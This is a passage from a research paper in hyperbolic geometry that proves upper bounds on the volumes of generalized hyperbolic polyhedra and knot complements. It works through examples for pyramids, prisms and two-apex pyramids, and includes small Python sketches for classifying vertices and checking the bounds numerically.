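    """Bilinear form <x, y> = -x0*y0 + x1*y1 + x2*y2 + x3*y3 on R^4."""
    return -x[0] * y[0] + x[1] * y[1] + x[2] * y[2] + x[3] * y[3]

def classify_vertex(p, tol=1e-12):
    """Classify a point p = (x1, x2, x3) of R^3, embedded as (1, x1, x2, x3) in RP^3.

    <x, x> < 0  <=>  |p| < 1 : finite vertex (inside H^3),
    <x, x> = 0  <=>  |p| = 1 : ideal vertex (on the boundary sphere),
    <x, x> > 0  <=>  |p| > 1 : hyperideal vertex (outside the closed ball).
    """
    x = (1.0, *p)
    q = minkowski_form(x, x)  # equals |p|^2 - 1
    if q < -tol:
        return "finite"
    if q > tol:
        return "hyperideal"
    return "ideal"

print(classify_vertex((0.3, 0.0, 0.2)))                             # finite
print(classify_vertex((1 / math.sqrt(2), 1 / math.sqrt(2), 0.0)))   # ideal
print(classify_vertex((1.5, 0.0, 0.0)))                             # hyperideal
```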
In the projective model of the hyperbolic space \(\mathbb{H}^{3}\), the following duality holds. For a \(k\)-dimensional, \(0\leq k\leq 2\), projective subspace \(\ell\subset\mathbb{RP}^{3}\), consider the corresponding \((k+1)\)-dimensional linear subspace \(L\subset\mathbb{R}^{4}\). Then the subspace \(L^{\perp}\), orthogonal to \(L\) with respect to the form \(\langle\,\ \rangle\) introduced above, is a \((3-k)\)-dimensional linear subspace in \(\mathbb{R}^{4}\) and defines a \((2-k)\)-dimensional projective subspace \(\ell^{\perp}\subset\mathbb{RP}^{3}\). In particular, if \(x\in\mathbb{RP}^{3}\setminus\overline{\mathbb{H}}^{3}\), then \(x^{\perp}\) is a plane that intersects \(\mathbb{H}^{3}\), and the point \(x\) is called _hyperideal_. The realization of a convex Euclidean polyhedron in the projective model of the space \(\mathbb{H}^{3}\) will be called a _generalized hyperbolic polyhedron_ if each of its vertices is finite, ideal or hyperideal. In this case, each edge of the polyhedron must contain internal points of the hyperbolic space. To each hyperideal point \(p\) we assign a _polar plane_ \(\Pi_{p}\subset\mathbb{H}^{3}\), which is a plane orthogonal to all lines passing through \(\mathbb{H}^{3}\) and \(p\). The plane \(\Pi_{p}\) divides \(\mathbb{H}^{3}\) into two half-spaces; denote by \(H_{p}\subset\mathbb{H}^{3}\) the one that contains \(0\in\mathbb{R}^{3}\). A generalized hyperbolic polyhedron \(P\) will be called _proper_ if for each hyperideal vertex \(v\) of the polyhedron \(P\) the interior of the half-space \(H_{v}\) contains all the finite vertices of the polyhedron \(P\). Let \(P\) be a generalized hyperbolic polyhedron and \(U(P)\) be the set of all its hyperideal vertices. We define the _truncation_ \(P_{tr}\) of a generalized hyperbolic polytope \(P\) as the following set: \[P_{tr}=P\bigcap_{v\in U(P)}H_{v}.\] Then the _volume of the generalized polyhedron_ \(P\) is defined as the volume of its truncation \(P_{tr}\). Note that if the polyhedron \(P\) is proper, then the dihedral angles at the new edges arising after truncation are equal to \(\pi/2\). Following [11] we will say a polyhedron \(\overline{\Gamma}\subset\mathbb{R}^{3}\subset\mathbb{RP}^{3}\) is a _rectification_ of a 3-connected planar graph \(\Gamma\) if the 1-skeleton of \(\overline{\Gamma}\) coincides with \(\Gamma\) and all edges of \(\overline{\Gamma}\) are tangent to \(\partial\mathbb{H}^{3}\). Notice that \(\overline{\Gamma}\) is not a generalized hyperbolic polyhedron since none of its edges intersect \(\mathbb{H}^{3}\). Nevertheless, for \(\overline{\Gamma}\), it is possible, as above, to define a truncation \(\overline{\Gamma}_{tr}\), which will be an ideal right-angled polyhedron whose 1-skeleton is the medial graph for \(\Gamma\). By the volume \(\operatorname{vol}(\overline{\Gamma})\) of the rectification \(\overline{\Gamma}\) we will understand the volume \(\operatorname{vol}(\overline{\Gamma}_{tr})\) of its truncation \(\overline{\Gamma}_{tr}\). In [9, Corollary 10] Atkinson obtained the following upper bound. Let \(P\) be a non-obtuse hyperbolic polyhedron containing \(V_{3}\) trivalent vertices and \(V_{4}\) quadrivalent vertices. Then \[\operatorname{vol}(P)<\frac{2V_{4}+3V_{3}-2}{4}\cdot v_{oct}+\frac{15V_{3}+20V_{4}}{16}\cdot v_{tet}. \tag{1}\] In [11] Belletti established that the volume of an arbitrary generalized hyperbolic polyhedron can be estimated from above by the volume of an ideal right-angled hyperbolic polyhedron constructed from its 1-skeleton. 
**Theorem 2.1**.: _[_11_, Theorem 4.2]_ _For any 3-connected planar graph \(\Gamma\),_ \[\sup_{P}\operatorname{vol}(P)=\operatorname{vol}(\overline{\Gamma}),\] _where \(P\) varies among all proper generalized hyperbolic polyhedra with 1-skeleton \(\Gamma\) and \(\overline{\Gamma}\) is the rectification of \(\Gamma\)._ By definition, the volume of the rectification \(\overline{\Gamma}\) is equal to the volume of the polyhedron \(\overline{\Gamma}_{tr}\), which is an ideal right-angled hyperbolic polyhedron whose 1-skeleton is the medial graph of the graph \(\Gamma\). By construction, all vertices of \(\overline{\Gamma}_{tr}\) are quadrivalent. Recall that if \(G\) is a plane embedding of a graph, then the _medial graph_ \(M(G)\) is the graph whose vertices correspond one-to-one to the edges of \(G\), and two vertices of \(M(G)\) are connected by an edge whenever the corresponding edges of \(G\) occur consecutively in some face of \(G\). The initial list of ideal right-angled polyhedra is presented in [18], where the first 248 values of the volumes of such polyhedra are also computed. A well-known infinite family of ideal right-angled polyhedra is the family of \(n\)-antiprisms for integers \(n\geq 3\). In particular, the 3-antiprism is an octahedron. The formula for the volumes of ideal \(n\)-antiprisms with cyclic symmetry was obtained by Thurston [38] in connection with the calculation of the volumes of the family of chain links. The arithmeticity of the groups generated by reflections in the faces of ideal right-angled antiprisms (and, consequently, the arithmeticity of the groups of the corresponding chain links) was investigated in the papers [25] and [29]. Two-sided bounds for the volumes of ideal right-angled hyperbolic polyhedra in terms of the number of their vertices were obtained by Atkinson [8, Theorem 2.2]. Namely, if \(P\) is an ideal right-angled hyperbolic polyhedron with \(V\) vertices, then \[\frac{v_{oct}}{4}\cdot V-\frac{v_{oct}}{2}\leqslant\operatorname{vol}(P) \leqslant\frac{v_{oct}}{2}\cdot V-2v_{oct}. \tag{2}\] At the same time, both inequalities turn into equalities when \(P\) is an ideal right-angled octahedron, that is, when \(V=6\). An ideal right-angled octahedron is the unique ideal right-angled polyhedron with \(V=6\), and its volume is \(v_{oct}\). The next ideal right-angled polyhedra have \(V\geq 8\) vertices, and the upper bound can be improved. Namely, it is shown in [19, Theorem 2.3] that if \(P\) is an ideal right-angled hyperbolic polyhedron with \(V\geq 8\) vertices, then \[\operatorname{vol}(P)\leqslant\frac{v_{oct}}{2}\cdot V-\frac{5v_{oct}}{2}. \tag{3}\] The volumes of polyhedra with the number of vertices \(V\leq 21\) were tabulated in [18]. Then it was shown in [5, Theorem 1.3] that the upper bound (2) can be improved further if polyhedra with \(V\leq 24\) vertices are excluded. Namely, by virtue of [5, Theorem 2.3], if \(P\) is an ideal right-angled hyperbolic polyhedron with \(V>24\) vertices, then \[\operatorname{vol}(P)\leqslant\frac{v_{oct}}{2}\cdot V-3v_{oct}. \tag{4}\] **Theorem 2.2**.: _Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is a 1-skeleton. 
Then the following inequalities hold._ * _If_ \(P\) _is a tetrahedron, then_ \(\operatorname{vol}(P)\leq v_{oct}\)_._ * _If_ \(P\) _is not a tetrahedron, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-\frac{5v_{oct}}{2}.\] * _If the number of edges_ \(E>24\)_, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-3v_{oct}.\] Proof.: It follows from Theorem 2.1 and the formulae (2), (3), (4). It is well known, see, for example, [12], that for every ideal right-angled polyhedron its 1-skeleton is the medial graph of two polyhedra combinatorially dual to each other. ## 3. Polyhedra with trivalent vertices and triangular faces Note that if the polyhedron \(P\) has some special combinatorial properties, then the upper bound for its volume can be improved. In this section, we will present improvements in the case when the information about the numbers of trivalent vertices and triangular faces is used. First of all, we consider the _regular_ ideal \(n\)-gonal bipyramid \(B_{n}^{r}\), \(n\geq 3\), see [4]. Regular means that \(B_{n}^{r}\) is obtained by gluing together \(n\) copies of an ideal tetrahedron \(T_{n}\) around a common edge, where \(T_{n}\) is given by the dihedral angles \(\frac{2\pi}{n}\), \(\frac{(n-2)\pi}{2n}\) and \(\frac{(n-2)\pi}{2n}\) for the edges incident to one of the vertices and the requirement that the dihedral angles at opposite edges of the tetrahedron are equal. That is, following the notation for ideal hyperbolic tetrahedra from [30], we can write that \(T_{n}=T(\frac{2\pi}{n},\frac{\pi}{2}-\frac{\pi}{n},\frac{\pi}{2}-\frac{\pi}{n})\). As shown in [4, Theorem 2.1], the maximum volume of an ideal \(n\)-gonal bipyramid is attained when it is regular. The formula for the volume of the tetrahedron \(T_{n}\) is given in [4] in the following form: \[\operatorname{vol}(T_{n})=\int_{0}^{2\pi/n}-\ln(2\sin\theta)\,d\theta+2\int_{0}^{\pi(n-2)/2n}-\ln(2\sin\theta)\,d\theta.\] By [30], this volume can also be written in terms of the Lobachevsky function as follows: \[\operatorname{vol}(T_{n})=\Lambda\left(\frac{2\pi}{n}\right)+2\Lambda\left( \frac{\pi}{2}-\frac{\pi}{n}\right)=2\Lambda\left(\frac{\pi}{n}\right),\] where we used the identities \(\Lambda(2x)=2\Lambda(x)+2\Lambda(x+\frac{\pi}{2})\) and \(\Lambda(-\theta)=-\Lambda(\theta)\). Thus, \[\operatorname{vol}(B_{n}^{r})=2n\Lambda\left(\frac{\pi}{n}\right).\] Below we will use this equality to estimate the volume of an ideal right-angled polyhedron. **Lemma 3.1**.: _Let \(P\) be an ideal right-angled hyperbolic polyhedron. Denote by \(p_{n}\), \(n\geq 3\), the number of its \(n\)-gonal faces. Then_ \[\operatorname{vol}(P)\leqslant\sum_{n\geq 3}\Lambda\left(\frac{\pi}{n} \right)p_{n}n-4v_{tet}. \tag{5}\] Proof.: Denote by \(\partial P\) the surface of the polyhedron \(P\), which naturally splits into polygons corresponding to the faces of \(P\). Let us choose a vertex \(v\) of \(P\) and connect \(v\) with the other vertices of \(P\) by geodesic lines. Thus, we obtain a subdivision of \(P\) into pyramids with apex \(v\) over the polygons of the splitting of \(\partial P\). For each resulting \(n\)-gonal pyramid, consider its double, which is an ideal \(n\)-gonal bipyramid. Since the maximum volume of an ideal \(n\)-gonal bipyramid is attained when it is regular [4, Theorem 2.1], the volume of each of the \(n\)-gonal pyramids under consideration is bounded by \(\frac{1}{2}\operatorname{vol}(B_{n}^{r})\), where, as above, the regular \(n\)-gonal bipyramid is denoted by \(B_{n}^{r}\). 
Since \(\operatorname{vol}(B_{n}^{r})=2n\Lambda\left(\frac{\pi}{n}\right)\), we get \[\operatorname{vol}(P)\leqslant\sum_{n\geq 3}\Lambda\left(\frac{\pi}{n}\right)p_{ n}n.\] Under this construction, the four pyramids based on the faces incident to \(v\) degenerate. Their contribution to the volume bound was no less than the sum of the volumes of four regular ideal tetrahedra, since \[4\cdot\frac{1}{2}\operatorname{vol}(B_{3}^{r})=4\cdot 3\Lambda\left(\frac{\pi}{3} \right)=4\cdot v_{tet}.\] Thus, the inequality (5) is obtained. By [4, Theorem 2.2], there is a bound \(\operatorname{vol}(B_{n}^{r})\leq 2\pi\ln(n/2)\) for \(n\geq 3\), with \(\operatorname{vol}(B_{n}^{r})\) growing asymptotically as \(2\pi\ln(n/2)\) for \(n\to\infty\). Using this bound for the volume of a regular bipyramid along with the inequality (5), we obtain the following result. **Corollary 3.2**.: _Let \(P\) be an ideal right-angled hyperbolic polyhedron. Denote by \(p_{n}\), \(n\geq 3\), the number of its \(n\)-gonal faces. Then_ \[\operatorname{vol}(P)\leqslant\pi\sum_{n\geq 3}\ln\left(\frac{n}{2}\right)p_{n} -4v_{tet}. \tag{6}\] Let \(P\) be an ideal right-angled hyperbolic polyhedron, and let \(p_{n}\), \(n\geq 3\), denote the number of its \(n\)-gonal faces. From Euler's formula for polyhedra and from the quadrivalence of the vertices of the polyhedron \(P\) it follows, see for example [19], that \[p_{3}=8+\sum_{k\geq 5}(k-4)p_{k}.\] Hence \(P\) has at least eight triangular faces. The following lemma gives bounds for the volume of an ideal right-angled polyhedron when information about the number of triangular faces is used. **Lemma 3.3**.: _Let \(P\) be an ideal right-angled hyperbolic polyhedron with \(V\) vertices and \(p_{3}\) triangular faces. Then_ * _The following inequality holds:_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\left(V-\frac{p_{3}+8}{4}\right).\] * _If_ \(V>24\)_, then_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\left(V-\frac{p_{3}+13}{4}\right).\] Proof.: (a) Let \(F\) be the number of faces of the polyhedron \(P\) and denote the faces by \(f_{1},\dots,f_{F}\). Similarly to the proof of Lemma 3.1, we consider the decomposition of the polyhedron \(P\) into ideal pyramids \(\tau_{i}\), \(i=1,\dots,F\), such that the face \(f_{i}\) is the base of \(\tau_{i}\) and all pyramids have a common apex \(v\). For each ideal pyramid \(\tau_{i}\), consider its doubling, the ideal bipyramid \(\beta_{i}\). Hence, \[\operatorname{vol}(P)=\frac{1}{2}\sum_{i=1}^{F}\operatorname{vol}(\beta_{i}).\] For definiteness, let \(\tau_{i}\) be an \(n\)-gonal pyramid for some \(n\geq 3\). Then \(\beta_{i}\) is an \(n\)-gonal bipyramid. Let us split \(\beta_{i}\) into ideal tetrahedra. If \(n=3\), then the pyramid \(\tau_{i}\) is a tetrahedron and \(\beta_{i}\) is the union of two ideal tetrahedra along a common face, whence \(\operatorname{vol}(\beta_{i})\leq 2v_{tet}\). If \(n\geq 4\), then \(\beta_{i}\) can be split into \(n\) ideal tetrahedra having a common edge that contains the apex \(v\) and its double \(v^{\prime}\), see the example for \(n=4\) shown in Figure 1. Thus, the volume of the \(n\)-gonal bipyramid is bounded by \(2v_{tet}\) if \(n=3\), and by \(nv_{tet}\) if \(n\geq 4\). Denote by \(E\) the number of edges of the polyhedron \(P\). Since all dihedral angles of the polyhedron \(P\) are equal to \(\pi/2\), each edge of \(P\) is incident to two bipyramids. 
Thus, the total number of base edges, summed over all bipyramids, is equal to twice the number of edges, \(2E\) (each edge of \(P\) lies in the bases of exactly two pyramids of the splitting and is therefore counted twice). Since the triangular bipyramids contribute \(3p_{3}\) base edges, the \(n\)-gonal bipyramids with \(n\geq 4\) contribute \(2E-3p_{3}\). Thus, \[2\operatorname{vol}(P)\leq 2v_{tet}\cdot p_{3}+v_{tet}\cdot(2E-3p_{3})=v_{tet} \cdot(4V-p_{3}), \tag{7}\] where we used \(E=2V\), since each vertex of \(P\) is quadrivalent. In the bound (7) we did not take into account that the apex \(v\) is incident to four faces, so four pyramids, and therefore four bipyramids, degenerate into flat ones. The contribution of these four bipyramids to (7) is at least \(4\cdot(2v_{tet})\), which corresponds to the case when all four of them are triangular bipyramids. Therefore, \[2\operatorname{vol}(P)\leq v_{tet}\cdot(4V-p_{3}-8),\] and so \[\operatorname{vol}(P)\leq 2v_{tet}\cdot\left(V-\frac{p_{3}+8}{4}\right).\] (b) Let us choose the common apex of the pyramids in a special way. Obviously, for each vertex of \(P\) there are four adjacent vertices. Following [5], we will say that two vertices are _quasi-adjacent_ if they are not adjacent but belong to the same face. According to [5, Lemma 2.1], if an ideal right-angled polyhedron has \(V>24\) vertices, then there is a vertex \(v_{0}\) that is quasi-adjacent to at least four vertices. Since \(v_{0}\) also has 4 adjacent vertices, we get that \(v_{0}\) is adjacent to four faces such that the sum of their numbers of sides is at least 16. Taking a splitting of \(P\) into pyramids with common apex \(v_{0}\), we get that at least 13 tetrahedra degenerate. The bound then follows by the same arguments as in item (a). Figure 1. Splitting an ideal 4-bipyramid into 4 ideal tetrahedra. Now we are ready to present the volume bounds which improve Theorem 2.2 in the case when additional information about the numbers of trivalent vertices and triangular faces is available. **Theorem 3.4**.: _Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is the 1-skeleton._ 1. _If_ \(P\) _has_ \(V_{3}\) _trivalent vertices and_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\cdot\left(E-\frac{p_{3}+V_{3}+8}{4} \right).\] 2. _If all vertices of_ \(P\) _are trivalent and there are_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant\frac{5v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10} \right).\] Proof.: (a) We use the notation \(V\), \(E\) and \(F\) for the numbers of vertices, edges and faces of the graph \(\Gamma\), and, similarly, \(\overline{V}\), \(\overline{E}\) and \(\overline{F}\) for the numbers of vertices, edges and faces of the 1-skeleton of the polyhedron \(\overline{\Gamma}_{tr}\). Since the 1-skeleton of \(\overline{\Gamma}_{tr}\) is the medial graph for \(\Gamma\), we have \(\overline{V}=E\), \(\overline{E}=2\overline{V}=2E\) and \(\overline{F}=V+F\). If a face of \(\overline{\Gamma}_{tr}\) corresponds to a vertex of \(\Gamma\), then the number of its sides is equal to the valence of the vertex. If a face of \(\overline{\Gamma}_{tr}\) corresponds to a face of \(\Gamma\), then the number of its sides is equal to the number of sides of the original face. Therefore, \(\overline{\Gamma}_{tr}\) has \(V_{3}+p_{3}\) triangular faces. Applying Theorem 2.1 and Lemma 3.3 to the polyhedron \(\overline{\Gamma}_{tr}\), we obtain the required inequality. 
(b) If all vertices of \(\Gamma\) are trivalent, then \(2E=3V=3V_{3}\). By substituting \(V_{3}=\frac{2}{3}E\) into the estimate from item (a), we get: \[\operatorname{vol}(P)\leq 2v_{tet}\cdot\left(E-\frac{p_{3}+\frac{2}{3}E+8}{4}\right)=\frac{5 v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10}\right),\] which completes the proof. **Remark 3.5**.: To compare the bounds obtained in Theorems 2.2 and 3.4, we note that the inequality \(\frac{5}{3}v_{tet}<\frac{1}{2}v_{oct}\) holds. Thus, if all the vertices of the polyhedron are trivalent, then the formulae from Theorem 3.4 give better asymptotics. Moreover, the inequality \[\frac{5v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10}\right)<\frac{v_{oct}}{2}\cdot E -3v_{oct}\] is equivalent to the inequality \[E+\frac{3v_{tet}}{3v_{oct}-10v_{tet}}p_{3}>\frac{6(3v_{oct}-4v_{tet})}{3v_{ oct}-10v_{tet}}.\] Using the approximate values \(v_{tet}=1.014941\) and \(v_{oct}=3.663863\), we obtain that for \[E+3.615410\cdot p_{3}>49.385163\] the bound from Theorem 3.4 is stronger. ## 4. Pyramids, prisms and two-apex pyramids In this section we give some examples of calculating upper bounds based on the formulae obtained above and compare them with known volume values. ### Pyramids Note that the medial graph for the 1-skeleton of the \(n\)-gonal pyramid \(P_{n}\) is the 1-skeleton of the \(n\)-antiprism \(A(n)\), see Figure 2 for \(n=4\). Figure 2. Pyramid \(P_{4}\) and antiprism \(A(4)\). Recall that the \(n\)-antiprism \(A(n)\) is an ideal right-angled polyhedron with \(2n\) 4-valent vertices, \((2n+2)\) faces, upper and lower \(n\)-gonal bases and a lateral surface formed by two layers of \(n\) triangles. Let \(n=3\). The triangular pyramid \(P_{3}\) is a tetrahedron with \(E=6\) edges, \(p_{3}=4\) triangular faces, and \(V_{3}=4\) trivalent vertices. From case (a) of Theorem 3.4 we get \[\operatorname{vol}(P_{3})<2\,v_{tet}\,\left(6-\frac{4+4+8}{4}\right)=4\,v_{tet}.\] Recall that the formula for the volume of a generalized hyperbolic tetrahedron was given in [39]. It is well known that the medial graph for the 1-skeleton of a tetrahedron is the 1-skeleton of an octahedron. The volume of an ideal right-angled octahedron is \(v_{oct}=3.663863\). Thus, the volume of any generalized tetrahedron does not exceed \(v_{oct}\). This fact was noted in [39]. Since \(v_{oct}<4\,v_{tet}\), the estimate obtained from Theorem 3.4 is valid, although it is not sharp. For \(n\geq 4\), the pyramid \(P_{n}\) has \(E=2n\) edges, \(p_{3}=n\) triangular faces, and \(V_{3}=n\) trivalent vertices. From case (a) of Theorem 3.4 we get \[\operatorname{vol}(P_{n})\leq 2\,v_{tet}\left(2n-\frac{2n+8}{4}\right)=3v_{ tet}\cdot n-4v_{tet}.\] Note that \(3v_{tet}\approx 3.044823\). Recall that the formula for the volume of an ideal right-angled hyperbolic antiprism \(A(n)\), \(n\geq 3\), is known. It was obtained by Thurston in [38]: \[\operatorname{vol}(A(n))=2n\,\left[\Lambda\left(\frac{\pi}{4}+\frac{\pi}{2n} \right)+\Lambda\left(\frac{\pi}{4}-\frac{\pi}{2n}\right)\right].\] Thus, for \(n\geq 4\), the volume of the generalized hyperbolic \(n\)-pyramid \(P_{n}\) satisfies the following inequality: \[\operatorname{vol}(P_{n})\leq 2n\,\left[\Lambda\left(\frac{\pi}{4}+\frac{\pi}{2n} \right)+\Lambda\left(\frac{\pi}{4}-\frac{\pi}{2n}\right)\right].\] The right side of the inequality is asymptotically equivalent to \(\frac{1}{2}v_{oct}\cdot n\) as \(n\to\infty\). 
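The following small numerical sketch (Python with SciPy; the choice of tooling is ours, the paper itself contains no code) evaluates the Lobachevsky function, Thurston's antiprism formula and the pyramid bound from case (a) of Theorem 3.4, so that the bound can be compared with the exact supremum \(\operatorname{vol}(A(n))\) given by Theorem 2.1.

```python
import numpy as np
from scipy.integrate import quad

def lobachevsky(theta):
    """Lambda(theta) = -integral_0^theta ln|2 sin t| dt (integrable log singularity at 0)."""
    val, _ = quad(lambda t: -np.log(np.abs(2.0 * np.sin(t))), 0.0, theta)
    return val

v_tet = 3 * lobachevsky(np.pi / 3)   # volume of the regular ideal tetrahedron, ~1.014942

def vol_antiprism(n):
    """Thurston's formula for the ideal right-angled n-antiprism A(n)."""
    return 2 * n * (lobachevsky(np.pi / 4 + np.pi / (2 * n))
                    + lobachevsky(np.pi / 4 - np.pi / (2 * n)))

def pyramid_bound(n):
    """Bound from case (a) of Theorem 3.4 for the n-gonal pyramid P_n, n >= 4."""
    return 3 * v_tet * n - 4 * v_tet

print(vol_antiprism(3))   # ~3.663863 = v_oct, since the 3-antiprism is the octahedron
for n in range(4, 9):
    # By Theorem 2.1, sup vol(P_n) = vol(A(n)); the Theorem 3.4 bound is weaker but explicit.
    print(n, round(vol_antiprism(n), 6), round(pyramid_bound(n), 6))
```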
### Prisms Denote by \(\Pi_{n}\) a generalized hyperbolic \(n\)-gonal prism for \(n\geq 3\), that is, a polyhedron having upper and lower \(n\)-gonal bases and \(n\) quadrangular faces on the lateral surface. The vertices of the polyhedron can be finite, ideal, or hyperideal, and the dihedral angles are such that the polyhedron can be realized in \(\mathbb{H}^{3}\). Let \(n=3\). The prism \(\Pi_{3}\) is a triangular prism that has \(E=9\) edges, \(p_{3}=2\) triangular faces, and \(V_{3}=6\) trivalent vertices. From case (a) of Theorem 3.4 we get that \[\operatorname{vol}(\Pi_{3})<2\,v_{tet}\cdot\left(9-\frac{2+6+8}{4}\right)=10 \,v_{tet}.\] At the same time, the rectification of \(\Pi_{3}\) is a polyhedron composed of two octahedra, whence \(\operatorname{vol}(\Pi_{3})\leq 2v_{oct}\). Since \(2v_{oct}<10\,v_{tet}\), the estimate obtained from Theorem 3.4 is valid, although it is not sharp. Let \(n=4\). The prism \(\Pi_{4}\) is a cube. It is easy to see that the medial graph for the 1-skeleton of a cube is the 1-skeleton of an ideal right-angled polyhedron \(Q_{14}\) with 8 triangular and 6 quadrangular faces, shown in Figure 3. Its volume is calculated in [18] and is approximately equal to 12.046092. This polyhedron is the union of two copies of the ideal antiprism \(A(4)\) along a quadrangular face. Note also that this polyhedron has the maximum volume among all nine ideal right-angled hyperbolic polyhedra with 14 faces. Let us now discuss the case \(n\geq 4\) in a unified way. In [9, Corollary 11] the following inequality for the volume of the prism \(\Pi_{n}\) was obtained: \[\operatorname{vol}(\Pi_{n})<\frac{3}{2}\,v_{oct}\cdot n-2\,v_{oct}. \tag{8}\] Note that \(\frac{3}{2}v_{oct}\approx 5.495794\). Since all the vertices of the prism \(\Pi_{n}\) are trivalent and its 1-skeleton has \(E=3n\) edges, from case (b) of Theorem 3.4 we obtain \[\operatorname{vol}(\Pi_{n})<5\,v_{tet}\cdot n-4\,v_{tet}. \tag{9}\] Note that \(5v_{tet}\approx 5.074705\). **Remark 4.1**.: The inequality \[5\,v_{tet}\cdot n-4\,v_{tet}<\frac{3}{2}\,v_{oct}\cdot n-2\,v_{oct}\] holds when \[n>\frac{2v_{oct}-4v_{tet}}{\frac{3}{2}v_{oct}-5v_{tet}}.\] Substituting the approximate values of the constants, we get that the bound (9) improves the bound (8) for \(n>7.760616\), that is, for \(n\geq 8\). The volume formula of an ideal right-angled hyperbolic \(n\)-antiprism \(A(n)\) was obtained in [38]. Using this formula, we get \[\operatorname{vol}(\Pi_{n})<2\operatorname{vol}(A(n))=4n\left[\Lambda\left( \frac{\pi}{4}+\frac{\pi}{2n}\right)+\Lambda\left(\frac{\pi}{4}-\frac{\pi}{2n} \right)\right].\] At the same time, \(\operatorname{vol}(A(n))\) is asymptotically equivalent to \(\frac{1}{2}v_{oct}\cdot n\) for \(n\to\infty\). Figure 3. Prism \(\Pi_{4}\) and polyhedron \(Q_{14}\). ### Two-apex pyramids Consider the polyhedron \(W_{n}\), \(n\geq 4\), which is obtained from the pyramid \(P_{n}\) as follows. Split the apex of the pyramid \(P_{n}\), replacing it with two new ones and connecting them with an edge. Then we connect one of the new apexes to two adjacent vertices of the base, and connect the other new apex to the remaining \((n-2)\) vertices of the base. As a result, the base of \(W_{n}\) is still an \(n\)-gon, and its lateral surface consists of two quadrilaterals and \((n-2)\) triangles, as shown in Figure 4 for \(n=6\). The polyhedron \(W_{n}\) will be called a _two-apex pyramid_. Obviously, \(W_{4}\) is a triangular prism \(\Pi_{3}\). 
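Returning briefly to the comparison of the bounds above, here is a tiny arithmetic check of the thresholds in Remarks 3.5 and 4.1 (plain Python; the constants are the approximate values quoted in the text):

```python
v_tet = 1.014941
v_oct = 3.663863

# Remark 3.5: Theorem 3.4(b) beats Theorem 2.2 when E + c * p_3 > d.
c = 3 * v_tet / (3 * v_oct - 10 * v_tet)
d = 6 * (3 * v_oct - 4 * v_tet) / (3 * v_oct - 10 * v_tet)
print(c, d)      # ~3.615410 and ~49.385163

# Remark 4.1: bound (9) beats bound (8) for n above this threshold.
n_star = (2 * v_oct - 4 * v_tet) / (1.5 * v_oct - 5 * v_tet)
print(n_star)    # ~7.760616, i.e. for n >= 8
```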
In this sense, the family of two-apex pyramids \(W_{n}\) can be considered as a generalization of the families of pyramids and prisms discussed above. The medial graph for the \(1\)-skeleton of the two-apex pyramid \(W_{n}\) is the \(1\)-skeleton of the polyhedron \(A(n)^{*}\), which was introduced in [18] and called a _twisted antiprism_, see Figure 4 for \(n=6\). For \(n\geq 5\), a two-apex pyramid \(W_{n}\) has \(E=2n+1\) edges, \(V_{3}=n+1\) trivalent vertices, and \(p_{3}=n-2\) triangular faces. From case (a) of Theorem 3.4 we obtain the following bound: \[\operatorname{vol}(W_{n})\leq 2v_{tet}\left(2n+1-\frac{(n-2)+(n+1)+8}{4}\right) =3v_{tet}\cdot n-\frac{3}{2}v_{tet}.\] Since the rectification of the polyhedron \(W_{n}\) is the polyhedron \(A(n)^{*}\), \[\operatorname{vol}(W_{n})\leq\operatorname{vol}(A(n)^{*}).\] As shown in [18], the volume of the twisted antiprism can be calculated via the volume of the antiprism in the following way: \[\operatorname{vol}(A(n)^{*})=\operatorname{vol}(A(n-1))+\operatorname{vol}(A(3)),\] and \(\operatorname{vol}(A(n)^{*})\) is asymptotically equivalent to \(\frac{1}{2}v_{oct}\cdot n\) as \(n\to\infty\). ## 5. Volume bound for links via the number of twists By the _volume of a hyperbolic knot or link_ \(K\subset S^{3}\) we mean the volume of the hyperbolic manifold \(S^{3}\setminus K\). In this section we will establish new upper bounds for the volumes of knots and links via combinatorial parameters of their diagrams. First of all, we recall the known bounds and illustrate them for the two-bridge knot \(\mathbf{b}(\frac{55}{17})\) as an example. A diagram of \(\mathbf{b}(\frac{55}{17})\) is presented in Figure 5. This figure corresponds to the continued fraction \(\frac{55}{17}=3+\frac{1}{4+\frac{1}{4}}\) and is known as the _Conway normal form_ for two-bridge knots and links [23, 36]. Calculating the volume with the computer program _SnapPy_ [37], we get \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))=10.117141\). Figure 4. Two-apex pyramid \(W_{6}\) and twisted antiprism \(A(6)^{*}\). Apparently, the first known estimate of the volume of a hyperbolic knot \(K\) in terms of the number of crossings \(c(K)\) in its diagram was obtained in Adams' dissertation [1]. It was shown that if the knot \(K\) is different from the figure-eight knot \(4_{1}\), then \[\operatorname{vol}(S^{3}\setminus K)\leq v_{tet}\cdot(4c(K)-16). \tag{10}\] Recall that \(\operatorname{vol}(S^{3}\setminus 4_{1})=2v_{tet}\). Since \(c(\mathbf{b}(\frac{55}{17}))=11\), the inequality (10) gives the estimate \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))\leq 28\cdot v_{ tet}=28.418348\). In [3], Adams improved the inequality (10) as follows: if \(c(K)\geq 5\), then \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq v_{oct}\cdot(c(K)-5)+4 \cdot v_{tet}. \tag{11}\] From inequality (11) we get \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))\leq 26.042942\). The next family of bounds for the volumes of knots and links uses the number of twists in a diagram. A _twist_ in the diagram \(D\) of a knot or link \(K\) is a maximal chain of consecutive bigon regions, see Figure 6. Equivalently, a twist can be understood as a chain of several consecutive half-turns on two strands, all directed in the same direction: either positive or negative. The number of half-turns in a twist will be called its _twist length_. The number of twists in the diagram \(D\) is denoted by \(t(D)\). 
